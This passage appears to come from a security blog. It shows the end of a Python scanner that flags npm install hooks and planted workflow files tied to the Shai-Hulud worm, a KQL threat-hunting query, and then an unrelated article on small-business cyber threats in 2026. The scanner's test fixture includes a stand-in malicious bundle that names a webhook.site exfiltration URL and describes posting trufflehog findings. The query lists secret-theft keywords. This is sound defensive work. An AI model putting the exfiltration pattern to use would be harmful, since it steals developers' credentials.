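                                     "command": cmd, "severity": "high" if markers else "review",
                                     "markers": sorted(set(markers))})
            elif in_workflows and name.endswith((".yml", ".yaml")):
                markers = _markers_in(_read(path))
                if markers:
                    findings.append({"package": "(repo workflow)", "path": path, "hook": "workflow",
                                     "command": "", "severity": "high", "markers": sorted(set(markers))})
    return findings


def build_sample_tree(root):
    """Constructed fixture (not a real package set): a clean package, a native build hook
    that only needs review, a worm-style postinstall, and a planted workflow file."""
    files = {
        "node_modules/acme-utils/package.json": json.dumps({"name": "acme-utils", "version": "1.0.0"}),
        "node_modules/acme-native/package.json": json.dumps(
            {"name": "acme-native", "version": "0.4.2", "scripts": {"install": "node-gyp rebuild"}}),
        "node_modules/acme-widgets/package.json": json.dumps(
            {"name": "acme-widgets", "version": "2.3.1", "scripts": {"postinstall": "node bundle.js"}}),
        "node_modules/acme-widgets/bundle.js": (
            "// constructed stand-in for the malicious bundle\n"
            "const sink = 'https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7';\n"
            "// ... runs trufflehog over the filesystem and posts what it finds\n"),
        ".github/workflows/shai-hulud-workflow.yml": (
            "name: Shai-Hulud\non: push\njobs:\n  run:\n    runs-on: ubuntu-latest\n"
            "    steps:\n      - run: echo constructed placeholder\n"),
    }
    for rel, content in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)


def demo():
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"[{f['severity']}] {f['package']} {f['hook']}: {f['command']} {f['markers']}")
```

Run it against a real checkout by calling scan_tree on the repository root; a "review" finding is just a package that runs code at install time, which is common for native modules, while a "high" finding should be treated as a compromise indicator and the tokens on that machine rotated.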
KQL Queries
Let’s jump into crafting a query we can use to hunt. This query can be adapted to whatever SIEM (security information and event management) tool you are using or learning with. KQL is the language I use, so I am going to work with that.
let lookback = 7d;
let procs = DeviceProcessEvents
| where TimeGenerated >= ago(lookback)
// bare names cover macOS/Linux developer machines as well as Windows
| where FileName in~ ("node.exe", "npm.exe", "yarn.exe", "git.exe", "gh.exe", "node", "npm", "yarn", "git", "gh")
| where ProcessCommandLine has_any ("postinstall", "preinstall", "install", "bundle.js", "eval(", "trufflehog", "gh repo create", "push", "remote add", "api.github.com")
| project TimeGenerated, Source = "Process", DeviceName, AccountName, FileName, ProcessCommandLine;
let files = DeviceFileEvents
| where TimeGenerated >= ago(lookback)
// DeviceFileEvents exposes the directory as FolderPath (there is no FilePath column)
| where (FolderPath contains ".github" and FolderPath contains "workflows")
    or FileName in~ ("processor.sh", "migrate-repos.sh")
    or FolderPath startswith "/tmp/github-migration"
| project TimeGenerated, Source = "File", DeviceName, AccountName, FolderPath, FileName, ActionType, SHA256;
procs
| union files
| sort by TimeGenerated desc
| take 200
Set a variable for the lookback window and for the table you want to call. This is a good habit to get into because it makes building bigger queries later much easier.
We are interested in the FileName and ProcessCommandLine columns to catch the npm lifecycle scripts and GitHub activity we are looking for, and in DeviceFileEvents for the workflow files or /tmp/*.sh scripts the worm drops.
The second variable (files) calls DeviceFileEvents.
In that KQL, the union operator simply combines the results of the two queries into one result set.
The first part (procs) collects suspicious process events (e.g., npm install with postinstall, trufflehog, etc.).
The second part (files) collects suspicious file events (e.g., .github/workflows changes or /tmp/processor.sh).
union merges them so you can review all suspicious signals in one results set instead of running two separate queries. If you’re just starting out, running the queries separately and exploring the logs is good too, for getting a feel for the tables.
This query may be noisy (the plain “install” term will match every routine npm install), but when hunting for activity we want to start wide and then narrow down. It is good to get a sense of what is benign and what is worth looking into further. The -migration suffix will likely pull in legitimate migration activity, but double-checking doesn’t hurt. You can filter out fields you don’t want to see to narrow the results down.
Takeaways and Recommendations
The Shai-Hulud incident shows how fast a supply-chain compromise can spread and why proactive hunting matters. This mindset builds resilience for organisations and sharpens investigative skills for analysts.
Always review new threat reports for relevance to your environment.
If risk is high, run a targeted hunt rather than waiting for alerts.
Maintain strong monitoring and tuned detections around Git and npm activity.
Enforce clear policies for developer workflows and package use.
Rotate and protect credentials aggressively after any suspected compromise.
The Biggest Cyber Threats Small Businesses Face in 2026
Introduction
“43% of cyberattacks target small businesses, yet 60% close within 6 months of a breach.”
The world is moving deeper into the tech space with rapid cloud adoption and an accelerating AI race. For small businesses, this creates both opportunity and risk. Cybersecurity is no longer just a “big business” concern — the evolving threat landscape directly impacts small and medium enterprises (SMEs) as they scale and adopt new technology to streamline operations.
The reality is cybercrime is evolving quickly, and it will eventually affect nearly everyone connected to the digital space. In this blog, we’ll break down the top cyber threats facing small businesses in 2026 and provide actionable defense strategies to help you stay secure.
Threat #1 – Ransomware-as-a-Service (RaaS)
Ransomware has long been a headline threat, but now it’s more accessible than ever. Cybercriminals can purchase Ransomware-as-a-Service (RaaS) kits that come with dashboards, technical support, and user-friendly interfaces — lowering the barrier to entry even for low-skill attackers.
Impact on small businesses:
Data loss
Downtime and disruption
Ransom payments
Reputational damage
Why SMEs are targeted: Larger organizations draw heavy scrutiny from law enforcement and security teams. Targeting smaller firms presents attackers with lower risk, higher volume, and a greater chance of ransom payment due to fear of reputational damage.
Defense strategies:
Maintain regular, tested backups of critical data
Patch and update operating systems and applications consistently
Deploy endpoint detection and response (EDR) solutions
Store offline, immutable backups segmented from production
Threat #2 – Phishing & Business Email Compromise (BEC)
Phishing remains the #1 entry point for attacks. Business Email Compromise (BEC) is particularly dangerous:
If a third-party supplier’s email is compromised, malicious emails may appear legitimate to your staff.
If your business email is breached, attackers can impersonate executives, escalate privileges, spread malware, and exfiltrate sensitive data.
In 2026, AI-generated phishing emails and voice deepfakes make detection harder. Messages that once looked obviously fake now require deeper analysis and stricter verification.
Defense strategies:
Conduct regular employee awareness training
Enforce multi-factor authentication (MFA) on all accounts
Use advanced email filtering and attachment/link sandboxing
Implement call-back/secondary-channel verification for financial or sensitive requests
Threat #3 – Supply Chain Attacks
Attackers increasingly compromise third-party vendors and SaaS platforms to target downstream clients. Recent incidents show how one weak link can impact many organizations.
Small businesses rely heavily on vendors and SaaS tools, so this risk cannot be eliminated. The key is understanding your risk tolerance and preparing for the risks you cannot remove.
Defense strategies:
Continuously monitor third-party integrations and API connections
Apply least-privilege access and scoped tokens for vendor accounts
Threat #4 – Cloud Misconfigurations & Data Leaks
As cloud adoption soars, misconfigured storage buckets and databases remain prime targets. Attackers constantly scan for exposed services, and simple mistakes can lead to devastating breaches.
Defense strategies:
Implement Cloud Security Posture Management (CSPM) and remediate findings
Encrypt sensitive data at rest and in transit
Enforce strong access controls, logging, and periodic permissions reviews
Enable private endpoints, network segmentation, and WAF where applicable
Threat #5 – Insider Threats & Human Error
Remote and hybrid work expands the attack surface. Insider threats — whether intentional or accidental — represent a significant risk for SMEs.
Examples:
Unintentional mistakes (e.g., emailing sensitive data to the wrong recipient)
Disgruntled employees deleting or leaking data after termination
Malicious insiders motivated by financial gain or coercion
Defense strategies:
Enforce the principle of least privilege (only the access needed for the job)
Restrict access to approved, compliant devices; use device posture checks
Apply conditional access policies and geo-restrictions
Implement Data Loss Prevention (DLP) and insider risk monitoring
Threat #6 – AI-Driven Attacks
AI is accelerating both offense and defense. Threat actors leverage AI to:
Automate phishing and social engineering
Crack passwords and test credentials more efficiently
Create deepfake audio/video to impersonate executives
Defense strategies:
Adopt a zero-trust approach (assume breach, verify explicitly, least privilege)
Deploy anomaly detection/UEBA to catch unusual behavior
Out-of-band verification for sensitive instructions and transactions
Takeaway
For small and medium businesses, improving security doesn’t need to be expensive or difficult. Some basic measures you can put in place: enable multi-factor authentication (MFA) everywhere (email, VPN, cloud apps), keep systems and firmware patched, and back up critical data offline with regular restore tests. Run phishing simulations to strengthen employee awareness, and maintain a documented incident response plan with clear roles and contacts. Centralize logging and monitoring with EDR/XDR, segment networks to limit lateral movement, and review third-party access regularly while rotating API keys or tokens.
Engaging a pay-per-session or retained security consultant is an excellent way for small and scaling businesses to strengthen their defenses. An experienced consultant can provide expert guidance, proactive monitoring, and tailored support that aligns with your business goals. They can identify gaps in your current security infrastructure, recommend practical improvements using the resources you already have, and design a roadmap that factors in long-term growth and scalability.
Conclusion
Cybersecurity is no longer optional for small businesses. The threats in 2026 from RaaS to AI-driven attacks demand proactive defense. By applying strong cyber hygiene, adopting modern security tools, and fostering a culture of awareness, small businesses can defend themselves against today’s most pressing threats and build resilience for the future.